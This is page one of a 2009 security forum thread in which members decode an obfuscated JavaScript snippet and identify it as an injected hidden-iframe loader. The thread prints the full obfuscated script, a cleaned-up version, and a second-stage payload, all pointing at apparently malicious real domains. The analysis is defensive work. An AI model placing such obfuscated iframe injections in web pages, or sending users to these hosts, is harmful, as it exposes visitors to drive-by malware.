HomeCalendarCertificationsColumnsFeaturesForumResourcesVitals
 
Image
 
linkedin_logo.png rss_logo.jpg
twitter_logo.png youtube_logo.jpg
Latest Additions
 
EH-Net Login
Welcome Guest.
Lost Password?
No account yet? Register
Who's Online
We have 45 guests and 1 member online
 
Free Business and Tech Magazines and eBooks

You are here: Home arrow Ethical Hacking Discussions and Related Certificationsarrow Web Applicationsarrow Decode Urgent Help Needed
EH-Net
May 22, 2013, 05:46:12 AM *
Welcome, Guest. Please login or register.
Did you miss your activation email?

Login with username, password and session length
News: Go back to The Ethical Hacker Network Online Magazine Home Page
 
   Home   Help Calendar Login Register  
Pages: [1] 2   Go Down
« previous next »
  Print  
Author Topic: Decode Urgent Help Needed  (Read 13153 times)
0 Members and 1 Guest are viewing this topic.
Dark_Knight
Sr. Member
****
Offline Offline

Posts: 292


View Profile WWW
« on: July 24, 2009, 05:54:14 PM »
I need some help here. Anybody have and idea what this does?
3364253334253337253330253230253733253734253739253663253635253364253237253736253639253733253639253632253639253663253639253734253739253361'+c26z3d+'253638253639253634253634253635253665253237253365253363253266253639253636253732253631'+c26z3d+'2536642536352533652729293B7D7661'+c26z3d+'72206D796961'+c26z3d+'3D747275653B3C2F7363726970743E';r5bb5e1df0.write(r3a5450e3d81(reeaa475ea65));

How could I decode this?
Logged
CEH, OSCP, GPEN, GWAPT, GCIA
http://sector876.blogspot.com
alan
Newbie
*
Offline Offline

Posts: 48


View Profile
« Reply #1 on: July 24, 2009, 06:27:47 PM »
how far have you gotten?

putting this portion into

3D747275653B3C2F7363726970743E

hex 2 ascii gives

=true;</script>

which looks reasonable! but i get stuck there!
Logged
Dark_Knight
Sr. Member
****
Offline Offline

Posts: 292


View Profile WWW
« Reply #2 on: July 24, 2009, 06:29:50 PM »
I initially tried the hex to ascii but had n luck. I will give it another shot.
Logged
CEH, OSCP, GPEN, GWAPT, GCIA
http://sector876.blogspot.com
alan
Newbie
*
Offline Offline

Posts: 48


View Profile
« Reply #3 on: July 24, 2009, 06:57:11 PM »
i think you could be missing a good portion of it, i've sent you a private message which may or may not be relavent
Logged
Jhaddix
Sr. Member
****
Offline Offline

Posts: 317



View Profile WWW
« Reply #4 on: July 24, 2009, 06:58:44 PM »
by first impressions id say its an XSS attack... a full decode would be required.
Logged
GSEC, GPEN, GWAPT, ECPPT, WAHHlive, LSOAdvancedPenTester

http://www.securityaegis.com
http://www.pentesterscripting.com
http://code.google.com/p/pentest-bookmarks/
Dark_Knight
Sr. Member
****
Offline Offline

Posts: 292


View Profile WWW
« Reply #5 on: July 24, 2009, 07:01:38 PM »
Thanks for all the help guys. I appreciate it.
Logged
CEH, OSCP, GPEN, GWAPT, GCIA
http://sector876.blogspot.com
Ketchup
Hero Member
*****
Offline Offline

Posts: 1021



View Profile
« Reply #6 on: July 24, 2009, 07:59:09 PM »
The rough translation is this:

Code:
style='visibility:hidden'></iframe>'));}var myia=true;</script>r5bb5e1df0.write(r3a5450e3d81(reeaa475ea65));

You are indeed missing a good portion of it.  I would agree with Jhaddix in that it is likely part of an XSS attack.
Logged
~~~~~~~~~~~~~~
Ketchup
UNIX
Hero Member
*****
Offline Offline

Posts: 1235


View Profile
« Reply #7 on: July 24, 2009, 11:58:48 PM »
I too would say, that a part is missing. Do you have the rest of it or were you just asking to get an idea what this could be?
Logged
Jhaddix
Sr. Member
****
Offline Offline

Posts: 317



View Profile WWW
« Reply #8 on: July 25, 2009, 01:31:17 AM »
ketchup's decode makes me think its a clickjacking attack, injected via xss.
Logged
GSEC, GPEN, GWAPT, ECPPT, WAHHlive, LSOAdvancedPenTester

http://www.securityaegis.com
http://www.pentesterscripting.com
http://code.google.com/p/pentest-bookmarks/
Dark_Knight
Sr. Member
****
Offline Offline

Posts: 292


View Profile WWW
« Reply #9 on: July 25, 2009, 09:27:05 AM »
<script>c26z634='';r28bd46b6=document;r28bd46b6.write('<scr'+'ipt>function r4373bbe(r52973acb7a){return ev'+c26z634+'al(r52973acb7a); }</scr'+'ipt>');  function c26e34eb22refb13(re3c3827f47){ function r8157f3fa362(){var r99011=16;return r99011;} var zf4='';return (r4373bbe('parseI'+zf4+'nt')(re3c3827f47,r8157f3fa362()));}function r3cf3d(rcba5aab2){ function r2554044(){var rc0ee24fd3=2;return rc0ee24fd3;} var r3ff7d7403c7='';r17e8d5766='fromCh';r26431=String[r17e8d5766+'arCode'];for(r7bb6b022=0;r7bb6b022<rcba5aab2.length;r7bb6b022+=r2554044()){ r3ff7d7403c7+=(r26431(c26e34eb22refb13(rcba5aab2.substr(r7bb6b022,r2554044()))));}return r3ff7d7403c7;} var r6671d26afb='3C7363726970743E69662821'+c26z634+'6D796961'+c26z634+'297B646F63756D656E742E777269746528756E65736361'+c26z634+'7065282027253363253639253636253732253631'+c26z634+'253664253635253230253665253631'+c26z634+'253664253635253364253633253332253336253230253733253732253633253364253237253638253734253734253730253361'+c26z634+'253266253266253737253737253737253265253631'+c26z634+'253732253665253638253635253664253264253634253639253631'+c26z634+'253664253631'+c26z634+'253665253734253265253665253663253266253366253237253262253464253631'+c26z634+'253734253638253265253732253666253735253665253634253238253464253631'+c26z634+'253734253638253265253732253631'+c26z634+'253665253634253666253664253238253239253261'+c26z634+'253331'+c26z634+'253330253339253339253330253338253239253262253237253330253635253339253332253335253632253237253230253737253639253634253734253638253364253336253333253339253230253638253635253639253637253638253734253364253331'+c26z634+'253337253332253230253733253734253739253663253635253364253237253736253639253733253639253632253639253663253639253734253739253361'+c26z634+'253638253639253634253634253635253665253237253365253363253266253639253636253732253631'+c26z634+'2536642536352533652729293B7D7661'+c26z634+'72206D796961'+c26z634+'3D747275653B3C2F7363726970743E';r28bd46b6.write(r3cf3d(r6671d26afb));</script><script>check_content()</script>

<script>if(!myia){document.write(unescape
<iframe name=c26 src='hxxp://www.arnhem-diamant.nl/?'+Math.round(Math.random()*109908)+'0e925b' width=639 height=1 c72 style='visibility:hidden'></iframe>      
=true;</script>
));}va

thats what I have so far. Apparently they go from Hex 2 asscii and then ascii to binary
Logged
CEH, OSCP, GPEN, GWAPT, GCIA
http://sector876.blogspot.com
Ketchup
Hero Member
*****
Offline Offline

Posts: 1021



View Profile
« Reply #10 on: July 25, 2009, 10:17:06 AM »
Well, they are obscuring the code a bit.  It's pretty common for goofy variable and function names to be used, like r58ss8a2, for example.  I cleaned up the code a little bit.  It looks like you are still missing some portion of it, although I doubt it is necessary.   The attack vector looks like a hidden IFRAME.

Code:
<script>

spacer='';
doc=document;
doc.write('<scr'+'ipt>function unknown_function1(unknown_var1){return ev'+spacer+'al(unknown_var1); }</scr'+'ipt>');


function function1(func1_arg1)
{

  function setvar1()
  {
    var var1=16;
    return var1;
  }
  var spacer2='';
  return (unknown_function1('parseI'+spacer2+'nt')(func1_arg1,setvar1()));
}

function function2(func2_arg1)
{
  function setvar2()
  {
    var var2=2;
    return var2;
  }
  var return_string='';
  string1='fromCh';
  string2=String[string1+'arCode'];
  for(i=0;i<func2_arg1.length;i+=setvar2())
  {
    return_string+=(string2(function1(func2_arg1.substr(i,setvar2()))));
  }
  return return_string;
}

var attack_vector='3C7363726970743E69662821'+spacer+'6D796961'+spacer+'297B646F63756D656E742E777269746528756E65736361'+spacer+'7065282027253363253639253636253732253631'+spacer+'253664253635253230253665253631'+spacer+'253664253635253364253633253332253336253230253733253732253633253364253237253638253734253734253730253361'+spacer+'253266253266253737253737253737253265253631'+spacer+'253732253665253638253635253664253264253634253639253631'+spacer+'253664253631'+spacer+'253665253734253265253665253663253266253366253237253262253464253631'+spacer+'253734253638253265253732253666253735253665253634253238253464253631'+spacer+'253734253638253265253732253631'+spacer+'253665253634253666253664253238253239253261'+spacer+'253331'+spacer+'253330253339253339253330253338253239253262253237253330253635253339253332253335253632253237253230253737253639253634253734253638253364253336253333253339253230253638253635253639253637253638253734253364253331'+spacer+'253337253332253230253733253734253739253663253635253364253237253736253639253733253639253632253639253663253639253734253739253361'+spacer+'253638253639253634253634253635253665253237253365253363253266253639253636253732253631'+spacer+'2536642536352533652729293B7D7661'+spacer+'72206D796961'+spacer+'3D747275653B3C2F7363726970743E';

<!-- ***** The above attack_vector variable translates to the following: ***** -->
<!-- ***** This was added by ketchup ***** -->
<script>
if(!myia)
{
  document.write(unescape( "'<iframe name=c26 src='http://www.arnhem-diamant.nl/?'+Math.round(Math.random()*109908)+'0e925b' width=639 height=172 style='visibility:hidden'></iframe>'"));
}
var myia=true;
</script>
<!-- ***** end translation of attack_vector variable ***** -->



<!-- ********* here is where it appears they write the attack vector *********** -->
document.write(function2(attack_vector));

</script>

<script>
  check_content()
</script>
Logged
~~~~~~~~~~~~~~
Ketchup
Dark_Knight
Sr. Member
****
Offline Offline

Posts: 292


View Profile WWW
« Reply #11 on: July 25, 2009, 10:22:13 AM »
Guys the help is GREATLY appreciated. So this looks like a XSS attack maybe as mentioned previously?
Logged
CEH, OSCP, GPEN, GWAPT, GCIA
http://sector876.blogspot.com
Ketchup
Hero Member
*****
Offline Offline

Posts: 1021



View Profile
« Reply #12 on: July 25, 2009, 10:35:55 AM »
Yep, I am not sure exactly what that link is doing, but I am not brave to find out Smiley
Logged
~~~~~~~~~~~~~~
Ketchup
Ketchup
Hero Member
*****
Offline Offline

Posts: 1021



View Profile
« Reply #13 on: July 25, 2009, 11:15:20 AM »
Here is what I pulled from the site referenced in the script.  I took the liberty of translating some of the code to make it more readable.   

This is interesting.  I will let you know if I find anything else.

Code:
<!-- ad -->
<script type="text/javascript">
var filler1 = "lRusrktXDJJYrvSgerej";
var filler2 = "OsFFoXlSOQCXadLJskRb";
var filler3 = "jEfJhqTablBNAwUHCnrO";

var shellcode? = "z60z105z102z114z97z109z101z32z119z105z100z116z104z61z34z52z56z48z34z32z104z101z105z103z104z116z61z34z54z48z34z32z115z114z99z61z34z104z116z116z112z58z47z47z119z119z119z46z103z97z114z100z101z110z45z97z114z116z46z103z114z47z34z32z115z116z121z108z101z61z34z98z111z114z100z101z114z58z48z112z120z59z32z112z111z115z105z116z105z111z110z58z114z101z108z97z116z105z118z101z59z32z116z111z112z58z48z112z120z59z32z108z101z102z116z58z45z53z48z48z112z120z59z32z111z112z97z99z105z116z121z58z48z59z32z102z105z108z116z101z114z58z112z114z111z103z105z100z58z68z88z73z109z97z103z101z84z114z97z110z115z102z111z114z109z46z77z105z99z114z111z115z111z102z116z46z65z108z112z104z97z40z111z112z97z99z105z116z121z61z48z41z59z32z45z109z111z122z45z111z112z97z99z105z116z121z58z48z34z62z60z47z105z102z114z97z109z101z62";

var filler4 = "mgpmcKufxlumukVYGnvu";
var filler5 = "FyzziVYoJTjQuBufAdRA";
var filler6 = "cUHXVBCVfUWXBJKmVWmB";

var array_var1 = shellcode?.split("z");

var filler7 = "EMwGVHsrdesOdfMoCHhk";
var filler8 = "sQVVvhKypribJcOSEVUP";
var filler9 = "gaVqDjIHFcWYXCCoEMiV";

var string_var1 = "";

var filler10 = "GmndopStCBOxlsqrCdDA";
var filler11 = "jWjVPaMREQRNXxbGzyyf";
var filler12 = "zAvXyXdyVbdHfvSeerMv";

for (var i=1; i<array_var1.length; i++)
{
  string_var1+=String.fromCharCode(array_var1[i]);
}
try
{
  document.write(string_var1);
}
catch(e)
{
}

var filler13 = "cEtIzLmeDzZbgWDQoxfq";
var filler14 = "nQFUmJkbGQRhsImNXTyo";
var filler15 = "fosYxelUyjIaDpPnYRyu";

</script>
<!-- /ad -->
</body></html>

<script>check_content()</script>
Logged
~~~~~~~~~~~~~~
Ketchup
Ketchup
Hero Member
*****
Offline Offline

Posts: 1021



View Profile
« Reply #14 on: July 25, 2009, 11:33:58 AM »
LOL, that's not shellcode.  I was over-analyzing it.   It's just another iframe:

Code:
<iframe width="480" height="60" src="http://www.garden-art.gr/" style="border:0px; position:relative; top:0px; left:-500px; opacity:0; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0); -moz-opacity:0"></iframe>

I traced it through a couple of more sites, and I am stuck here:

Code:
<iframe width="480" height="60" src="http://ddosguard.info/vsetakoe/?96d440414dfad88fe5c6de195a254e50" style="border:0px; position:relative; top:0px; left:-500px; opacity:0; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0); -moz-opacity:0"></iframe>

The hash value being passed to that URL seems to be some sort of authentication hash (md5).  I am guessing this one is either not valid or is disabled because I am not getting anything from this page.  If you alter the parameter or delete it, you get plain text on the page that resembles BASE64 encoding.  The BASE64 text varies depending on how you alter the parameter.   It doesn't appear to translate to anything readable, at least not in English.
« Last Edit: July 25, 2009, 12:12:49 PM by Ketchup » Logged
~~~~~~~~~~~~~~
Ketchup
Pages: [1] 2   Go Up
  Print  
« previous next »
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.18 | SMF © 2013, Simple Machines
Joomla Bridge by JoomlaHacks.com 		Valid XHTML 1.0! Valid CSS!
Page created in 0.09 seconds with 23 queries.
 
Exclusive Deal

sansfire13_245x90_cw90.jpg
SANSFIRE 2013
June 15 - 22

5% Off w/ Code: EHN_5

SANS Deals 4 EH-Netters
5% OFF Any SANS Course in Any Format!
Coupon Code: EHN_5 Including SANS Rocky Mountain 2013 & SANS Boston 2013
Polls
Compared to this year, 2013 will be:
 
Recent Forum Topics
EH-Net News Feeds
Latest Additions
 
         
Advertisement

© 2013 The Ethical Hacker Network
Joomla! is Free Software released under the GNU/GPL License.